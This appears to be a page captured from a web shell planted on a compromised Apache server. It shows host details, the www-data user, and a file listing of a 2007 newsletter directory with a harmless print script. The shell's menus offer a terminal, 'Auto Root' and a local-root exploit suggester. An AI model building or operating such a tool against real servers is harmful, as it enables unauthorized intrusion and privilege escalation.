Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
cesa.co.za /
insidetrack /
october2007 /
Delete
Unzip
Name
Size
Permission
Date
Action
images
[ DIR ]
drwxr-sr-x
2008-01-08 17:14
.Index.txt
278
B
-rw-r--r--
2008-01-08 17:13
SAACE_Newsletter_October.pdf
373.36
KB
-rw-r--r--
2008-01-08 17:14
SAACE_Newsletter_October_original.pdf
924.99
KB
-rw-r--r--
2008-01-08 17:15
default.htm
24.08
KB
-rw-r--r--
2008-01-08 17:13
scripts.js
1.15
KB
-rw-r--r--
2008-01-08 17:15
style.css
602
B
-rw-r--r--
2008-01-08 17:15
Save
Rename
function blockError(){return true;} window.onerror = blockError; //---------------------------------------------------------------------------------------- var gAutoPrint = true; // Flag for whether or not to automatically call the print function function printSpecial() { if (document.getElementById != null) { var html = '<HTML>\n<HEAD>\n'; if (document.getElementsByTagName != null) { var headTags = document.getElementsByTagName("head"); if (headTags.length > 0) html += headTags[0].innerHTML; } html += '\n</HE' + 'AD>\n<BODY>\n'; var printReadyElem = document.getElementById("printReady"); if (printReadyElem != null) { html += printReadyElem.innerHTML; } else { alert("Could not find the printReady section in the HTML"); return; } html += '\n</BO' + 'DY>\n</HT' + 'ML>'; var printWin = window.open("","printSpecial"); printWin.document.open(); printWin.document.write(html); printWin.document.close(); if (gAutoPrint) printWin.print(); } else { alert("Sorry, the print ready feature is only available in modern browsers."); } }